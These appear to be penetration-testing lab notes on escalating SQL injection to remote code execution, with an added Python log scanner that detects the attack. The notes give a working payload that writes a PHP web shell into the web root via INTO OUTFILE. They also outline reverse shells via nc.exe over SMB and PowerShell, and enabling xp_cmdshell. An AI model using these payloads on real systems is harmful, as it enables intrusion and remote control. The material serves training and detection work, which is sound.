SQLi to RCE
Escalate SQLi to RCE by writing malicious code into a file that can then be executed via the web server or by other means:
http://10.11.0.22/debug.php?id=1
union all select 1,2, "<?php echo shell_exec($_GET['cmd']); ?>" into OUTFILE 'C:/xampp/htdocs/backdoor.php'
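The request above as it looks from the defender's side, in an added example that is not part of the original notes: a scan of web-server access logs for query strings that carry a MySQL `into OUTFILE` clause, with or without embedded PHP. The log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format line: client IP first, then "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+"')
# MySQL file-write clause and PHP code markers; both appear in the request above.
FILE_WRITE_RE = re.compile(r"\binto\s+outfile\b")
PHP_CODE_RE = re.compile(r"<\?php|\bshell_exec\s*\(")


def normalize(target, max_rounds=3):
    """URL-decode until stable (covers double encoding), then fold whitespace and case."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target).lower()


def scan(lines):
    """Return (client_ip, path, reasons) for each request carrying a file-write clause."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        text = normalize(m.group("target"))
        if not FILE_WRITE_RE.search(text):
            continue
        reasons = ["into outfile"]
        if PHP_CODE_RE.search(text):
            reasons.append("php code in query")
        findings.append((m.group("ip"), m.group("target").split("?")[0], reasons))
    return findings


# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '10.11.0.4 - - [01/Jan/2024:10:00:00 +0000] "GET /debug.php?id=1 HTTP/1.1" 200 512',
    '10.11.0.4 - - [01/Jan/2024:10:00:05 +0000] "GET /debug.php?id=1%20union%20all%20select%201,2,%22%3C?php%20echo%20shell_exec($_GET[%27cmd%27]);%20?%3E%22%20into%20OUTFILE%20%27C:/xampp/htdocs/backdoor.php%27 HTTP/1.1" 200 128',
    '10.11.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /debug.php?id=1%2520INTO%2520%2520OutFile%2520%2527x%2527 HTTP/1.1" 500 0',
    '10.11.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /search?q=how+to+get+into+college HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On the database side, MySQL's `secure_file_priv` setting restricts where `INTO OUTFILE` may write, and a database account without the `FILE` privilege cannot use it at all.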
Blind SQLi to RCE
Host an SMB share to fetch and execute "nc.exe" and get a proper reverse shell.
Use a PowerShell base64-encoded payload to get a reverse shell. (Worked in PEN200 lab)
SQL Svc account to RCE
Using mssqlclient.py, we can log in to a machine if we have valid creds, like this ->
Now, just enable_xp_cmdshell and execute commands!!